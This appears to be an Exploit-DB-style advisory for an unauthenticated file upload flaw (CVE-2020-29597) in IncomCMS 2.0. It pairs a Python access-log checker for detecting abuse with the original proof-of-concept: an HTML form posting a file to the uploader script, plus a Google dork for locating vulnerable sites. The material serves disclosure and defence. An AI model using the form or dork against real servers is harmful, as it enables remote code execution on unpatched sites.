Vendor: IncomCMS
By: MoeAlBarbari
CVSS: 9.8 (CRITICAL)
Type: Insecure File Upload
CWE: 434
Product Name: IncomCMS
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: YES
Related CVE: CVE-2020-29597
CPE: a:incomcms:incomcms:2.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: BackBox Linux
2020

IncomCMS 2.0 – Insecure File Upload

IncomCMS 2.0 contains an insecure file upload vulnerability. An attacker can upload malicious files to the server without any authentication, which can lead to remote code execution and other malicious activities.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update their installations to the latest version.
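
A log check for the uploader endpoint used in the proof of concept on this page, added here as an example and not taken from the original advisory or the vendor: it flags POSTs to the uploader script in combined-format access logs and any later script fetch from the module directory by the same client. The executable-extension list, the reading of status codes and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Uploader path taken from the proof-of-concept form on this page.
UPLOADER_SUFFIX = "/modules/uploader/showcase/script.php"
MODULE_DIR = "/modules/uploader/"
# Assumption: extensions the web server would execute rather than serve as data.
SCRIPT_EXTS = (".php", ".phtml", ".php5", ".phar")

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})\b'
)

def normalise(target):
    """Drop the query string, percent-decode and lower-case the request path."""
    return unquote(urlsplit(target).path).lower()

def find_upload_activity(lines):
    """Return (kind, client_ip, path) findings in log order."""
    findings, uploaders = [], set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path = m["ip"], normalise(m["target"])
        accepted = m["status"].startswith("2")
        if path.endswith(UPLOADER_SUFFIX):
            if m["method"] == "POST":
                kind = "upload-accepted" if accepted else "upload-rejected"
                findings.append((kind, ip, path))
                if accepted:
                    uploaders.add(ip)
        elif ip in uploaders and accepted and MODULE_DIR in path and path.endswith(SCRIPT_EXTS):
            # A client that just uploaded is now fetching a script from the module tree.
            findings.append(("script-fetched-after-upload", ip, path))
    return findings

# Constructed sample log lines (documentation IP ranges, placeholder upload directory).
SAMPLE_LOG = [
    '198.51.100.7 - - [07/Dec/2020:10:01:02 +0000] "GET /incom/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [07/Dec/2020:10:02:10 +0000] "POST /incom/modules/uploader/showcase/script.php HTTP/1.1" 200 31 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [07/Dec/2020:10:02:15 +0000] "GET /incom/modules/uploader/showcase/PLACEHOLDER_DIR/x.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [07/Dec/2020:10:03:00 +0000] "POST /incom/modules/uploader/showcase/script%2Ephp HTTP/1.1" 403 199 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for finding in find_upload_activity(SAMPLE_LOG):
        print(*finding)
```

An accepted upload followed by a script fetch from the same client is the pattern to escalate; rejected uploads after patching show that the endpoint is still being probed.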

Exploit-DB raw data:

# Exploit Title:  IncomCMS 2.0 - Insecure File Upload
# Google Dork: intext:"Incom CMS 2.0"
# Date: 07.12.2020
# Exploit Author: MoeAlBarbari
# Vendor Homepage:  https://www.incomcms.com/
# Version: 2.0
# Tested on: BackBox linux
# CVE: CVE-2020-29597

<!DOCTYPE html>
<html>
<head>
  <title>Upload your files</title>
</head>
<body>
  <!-- Posts a multipart file field named "Filedata" directly to the uploader script; the form carries no credentials or token -->
  <form enctype="multipart/form-data" action="http://www.example.com/incom/modules/uploader/showcase/script.php" method="POST">
    <p>Upload your file</p>
    <input type="file" name="Filedata"><br>
    <input type="submit" value="Upload">
  </form>
</body>
</html>